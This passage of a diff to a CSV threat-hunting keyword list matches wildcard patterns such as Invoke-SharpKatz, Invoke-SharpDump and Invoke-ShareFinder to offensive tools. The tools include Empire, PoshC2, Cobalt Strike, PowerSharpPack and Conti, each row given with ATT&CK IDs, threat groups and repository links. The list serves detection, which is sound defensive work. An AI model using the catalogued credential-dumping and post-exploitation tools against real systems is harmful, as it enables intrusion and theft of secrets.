Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ServicesPermissionsRegistryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-ServicesUnquotedPathCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-ServicesUnquotedPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ServicesUnquotedPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-SessionGopher*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-SessionGopher*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SessionGopher*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SessionGopher*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-ShadowSpray*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*invoke-sharefinder *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SessionGopher*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SessionGopher*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SessionGopher*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-ShadowSpray*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*invoke-sharefinder *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*invokesharefinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-ShareFinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-ShareFinder*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. 
Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-ShareFinder*","offensive_tool_keyword","Jira-Lens","finds (non-standard) shares on hosts in the local domain","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://powersploit.readthedocs.io/en/stable/Recon/README/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-ShareFinder*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-SharpAllowedToAct*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpBlock*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpBypassUAC*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpChromium*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpClipboard*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpCloud*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpCloud*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-Sharpcradle*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SharpDPAPI*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 
-"*Invoke-SharPersist*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpGPO*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SharpGPOAbuse*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpGPO-RemoteAccessPolicies*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpHandler*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpHide*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 
- T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*InvokeSharpHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*Invoke-Sharphound*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-Sharphound2*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Sharphound3*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpHound4*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 
-"*Invoke-Sharphound4*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SharpImpersonation*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpImpersonation*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SharpImpersonationNoSpace*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpLdapRelayScan*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell 
for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpLdapRelayScan*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-Sharplocker*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpLoginPrompt*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpMove*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpPrinter*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpPrinter*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SharpPrintNightmare*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpRDP*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-ShareFinder*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
